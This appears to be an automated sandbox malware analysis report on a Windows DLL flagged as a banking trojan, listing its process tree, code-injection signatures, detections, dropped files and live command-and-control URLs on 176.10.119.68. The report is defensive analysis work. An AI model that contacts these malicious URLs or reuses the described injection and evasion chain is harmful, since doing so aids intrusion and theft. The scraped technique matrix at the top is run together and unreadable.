                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 633919 Sample: zs5n5sI6N2 Startdate: 25/05/2022 Architecture: WINDOWS Score: 100 67 Snort IDS alert for network traffic 2->67 69 Found malware configuration 2->69 71 Antivirus detection for URL or domain 2->71 73 3 other signatures 2->73 11 loaddll32.exe 1 2->11         started        13 mshta.exe 19 2->13         started        process3 process4 15 cmd.exe 1 11->15         started        17 WerFault.exe 2 9 11->17         started        19 WerFault.exe 3 9 11->19         started        21 WerFault.exe 3 9 11->21         started        23 powershell.exe 32 13->23         started        signatures5 26 rundll32.exe 1 6 15->26         started        83 Injects code into the Windows Explorer (explorer.exe) 23->83 85 Writes to foreign memory regions 23->85 87 Modifies the context of a thread in another process (thread injection) 23->87 89 2 other signatures 23->89 30 csc.exe 3 23->30         started        33 csc.exe 23->33         started        35 conhost.exe 23->35         started        process6 dnsIp7 65 176.10.119.68, 49771, 80 AS-SOFTPLUSCH Switzerland 26->65 91 System process connects to network (likely due to code injection or exploit) 26->91 93 Writes to foreign memory regions 26->93 95 Allocates memory in foreign processes 26->95 97 3 other signatures 26->97 37 control.exe 1 26->37         started        59 C:\Users\user\AppData\Local\...\rn2v1u0v.dll, PE32 30->59 dropped 40 cvtres.exe 1 30->40         started        61 C:\Users\user\AppData\Local\...\0rxpcrxp.dll, PE32 33->61 dropped 42 cvtres.exe 33->42         started        file8 signatures9 process10 signatures11 75 Changes memory attributes in foreign processes to executable or writable 37->75 77 Injects code into the Windows Explorer (explorer.exe) 37->77 79 Writes to foreign memory regions 37->79 81 4 other signatures 37->81 44 explorer.exe 37->44 injected process12 signatures13 99 Changes memory attributes in foreign processes to executable or writable 44->99 101 Self deletion via cmd delete 44->101 103 Writes to foreign memory regions 44->103 105 2 other signatures 44->105 47 cmd.exe 44->47         started        50 RuntimeBroker.exe 44->50 injected 52 cmd.exe 44->52         started        process14 signatures15 107 Uses ping.exe to sleep 47->107 109 Uses ping.exe to check the status of other devices and networks 47->109 54 PING.EXE 47->54         started        57 conhost.exe 47->57         started        process16 dnsIp17 63 192.168.2.1 unknown unknown 54->63

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      zs5n5sI6N2.dll41%ReversingLabsWin32.Trojan.Lazy
                      zs5n5sI6N2.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.1000000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://176.10.119.68/4%VirustotalBrowse
                      http://176.10.119.68/100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZ100%Avira URL Cloudphishing
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk100%Avira URL Cloudphishing
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB100%Avira URL Cloudphishing
                      http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco100%Avira URL Cloudphishing
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlktrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlktrue
                      • Avira URL Cloud: phishing
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://176.10.119.68/rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmptrue
                      • 4%, Virustotal, Browse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZrundll32.exe, 00000003.00000003.370432738.0000000000F55000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pBrundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftcorundll32.exe, 00000003.00000002.507972580.0000000000F55000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      176.10.119.68
                      		unknownSwitzerland
                      		51395AS-SOFTPLUSCHtrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:633919
                      Start date and time: 25/05/202211:25:192022-05-25 11:25:19 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 14m 51s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:zs5n5sI6N2 (renamed file extension from none to dll)
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:42
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@29/29@0/2
                      EGA Information:
                      • Successful, ratio: 75%
                      HDC Information:
                      • Successful, ratio: 22.1% (good quality ratio 20.1%)
                      • Quality average: 78.9%
                      • Quality standard deviation: 31.5%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 146
                      • Number of non-executed functions: 210
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.89.179.12, 13.107.42.16
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6732 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      11:26:44API Interceptor2x Sleep call for process: WerFault.exe modified
                      11:26:57API Interceptor1x Sleep call for process: rundll32.exe modified
                      11:27:42API Interceptor23x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      176.10.119.68628df1368bdb5.dllGet hashmaliciousBrowse

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        AS-SOFTPLUSCH628df1368bdb5.dllGet hashmaliciousBrowse
                        • 176.10.119.68
                        PE ID & DLT TEMPLATE.exeGet hashmaliciousBrowse
                        • 91.192.100.5
                        Payment Slip 01.exeGet hashmaliciousBrowse
                        • 91.192.100.5
                        bank_payment-doc.exeGet hashmaliciousBrowse
                        • 91.192.102.107
                        BJp3aUvrt9.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        62835e34e60c1.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        62835e34e60c1.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        P5ASinnD4i.exeGet hashmaliciousBrowse
                        • 176.10.119.117
                        5A30ie6lsZ.exeGet hashmaliciousBrowse
                        • 176.10.119.117
                        OIpCcXM6Y5.exeGet hashmaliciousBrowse
                        • 176.10.119.117
                        xaj0e933Uv.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        tIJVb0BvkI.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        XoVzWJQAQ0.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        qOfIxt1fnQ.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        2oCOO5LbPu.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        rXN8OIpbzz.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        GlJdt15gDI.dllGet hashmaliciousBrowse
                        • 185.189.151.28
                        o52M6ZqBFpGet hashmaliciousBrowse
                        • 176.10.116.173
                        com.abbondioendrizzi.tools.supercleaner-9-apkplz.net.apkGet hashmaliciousBrowse
                        • 176.10.119.156
                        com.pagnotto28.sellsourcecode.supercleaner-9-apkplz.net.apkGet hashmaliciousBrowse
                        • 176.10.119.156

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_2ce29cfeeebc853567a148791f146b4541ff5338_7cac0383_0c0874ee\Report.wer

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7414878379061339
                        Encrypted:false
                        SSDEEP:96:29L4VnYyey9hasCj+ASZpXIQcQac6pcEccw35+a+z+HbHghownOgtYsXqOEX/vFW:sqn1H0tGtjCq/u7sDS274Itb
                        MD5:3122AD34CF8329BB6EBD0E8D111E4087
                        SHA1:999CAA75892DB4C0844D7B460220CB9B21C1EA19
                        SHA-256:F71BA276707F0E7720708EB5D9CC9D6EC23AC2252083F5BB6A29CE5794C1DC78
                        SHA-512:9B75B1C2B4EC3D11BEB712870BE21D840884544275942D3D64DAE23CB9F1534924923A972A69557F09B2BC21D48645D6C03CAFB8ECE21034229CD3C88FF0EE21
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.4.3.9.7.2.9.8.1.1.4.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.0.3.0.0.8.5.-.2.7.7.f.-.4.d.7.e.-.b.b.4.4.-.d.4.f.d.5.c.d.e.b.e.2.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.6.e.7.3.6.f.-.f.0.e.c.-.4.d.4.1.-.9.2.7.6.-.6.7.4.c.4.f.7.3.7.6.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.8.0.-.0.0.0.1.-.0.0.1.c.-.a.1.8.c.-.f.b.8.5.1.9.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_34661168243cfabc5e1ee2a141f8dfa8ff2298_7cac0383_1454ac5a\Report.wer

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7447297265547901
                        Encrypted:false
                        SSDEEP:96:gZFhVnYy9y9hasCjmfspXIQcQJc6VccEBFcw3Brq+a+z+HbHghownOgtYsXqOEXY:URnZHnJcphwjCq/u7sDS274ItW
                        MD5:612790C6049DF86989352C75FF80C799
                        SHA1:51B73A9F377C7703629EF594D7CC822C6239704B
                        SHA-256:C60E7DF72E6F2DD6CFD266A9FFF1F6F235201D378811529C6901FDEE6348B85B
                        SHA-512:8D45A9C7256636A634982AC9DEA5D9DC6BF58E4F24DA8824616BEAB97CCAF7EC15A3BDCFBAC8E814DC2A323F7452C5B4B47069CA1B942410F3B161E0B42DDB7F
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.4.4.0.9.2.3.6.2.5.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.9.4.4.4.1.2.3.9.2.5.0.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.a.5.5.3.7.4.-.e.a.7.5.-.4.6.f.f.-.b.6.8.0.-.a.d.b.c.9.1.b.d.d.b.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.1.8.7.f.c.5.-.3.2.a.d.-.4.3.2.5.-.b.5.4.f.-.8.a.8.5.f.1.c.1.a.d.2.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.8.0.-.0.0.0.1.-.0.0.1.c.-.a.1.8.c.-.f.b.8.5.1.9.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_07688b93\Report.wer

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7488102922693348
                        Encrypted:false
                        SSDEEP:96:EtFlgVnYyDy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHghownOgtYsXqOEX/vF9:8WnlH0tGtjCq/u7sDS274ItW
                        MD5:18E4E82637478C9977F4CC69CE04C054
                        SHA1:8F47765B89680E02345DBFCD7D646ECD232BE62F
                        SHA-256:62F8AC43AF175660855F62EEBBD281264AD13653A75653048C5A9F6F2D00DE4D
                        SHA-512:E13E01D9F600F1866C61D5278FFE22FCEC540CAE891EEF19F4F13E87B83C92EBA5C28B2FE332806842CD175F6E82B55BC7DCCA8DBC3A1FBCF187A356A3DD0BCE
                        Malicious:false
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.9.4.4.4.0.1.7.5.5.2.7.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.9.4.4.4.0.3.4.1.1.4.9.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.8.c.b.9.8.1.-.c.2.0.e.-.4.5.0.9.-.8.7.8.a.-.c.c.c.0.0.b.2.7.c.9.e.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.9.d.3.d.3.b.-.7.f.e.9.-.4.0.d.1.-.9.0.3.3.-.d.4.7.1.7.9.d.8.7.3.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.8.0.-.0.0.0.1.-.0.0.1.c.-.a.1.8.c.-.f.b.8.5.1.9.7.0.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E47.tmp.dmp

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Wed May 25 09:26:37 2022, 0x1205a4 type
                        Category:dropped
                        Size (bytes):34890
                        Entropy (8bit):2.0871699584549472
                        Encrypted:false
                        SSDEEP:96:5h8oF8NGYG/9CHM1hgnoi710/DQ1rIa2gJzF32OKvnZheGWIRWIXAI4EnJBwga1H:ULG/51hgoO1Brp24GOYziEJBwgaTyw9
                        MD5:F0C9AFEE351CEECD0EE114CFBF699D21
                        SHA1:7F8074F0115265A26B9C377AFC6E15DD905C88AC
                        SHA-256:18C525091F3CF41C96831ED38A66FE7E8772F467E446666E78B449927BA2CFDF
                        SHA-512:EE087C5146560C1EA08C620826DAA464747873278731EBDFC65327FF11479397CAD5F91C00B90E7B47F2FE13F3CFB592FC53DA6879D52CFF42B39C6B737109AF
                        Malicious:false
                        Preview:MDMP....... .......M..b........................L...........$...............~!..........`.......8...........T...........(..."x...........................................................................................U...........B..............GenuineIntelW...........T...........I..b.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER7136.tmp.WERInternalMetadata.xml

                        Download File
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8346
                        Entropy (8bit):3.692217837765199
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi+n6bfZm6Y4TSUtsgmfISG+pN389bEB1f5MMm:RrlsNie6Fm6YMSUtsgmfISkEDfc
                        MD5:789351A69FF01E029E9232B20548C291
                        SHA1:1B5B4A91729BE69471015008A1DAD5827E72F1AD
                        SHA-256:28D990D18B807EB7743AE19CBB32EBAED164A4711E0B9C699E9630AA75DF1147
                        SHA-512:B0BCAE5A4ACF5B2E96390251D45E8D1FCD7E66CA6F7616356BFD2AD9D7908C1810E6ACEAAC8965E11597CA89001A1FE90AC7236BA73A0B8653B62680591F3F13
                        Malicious:false
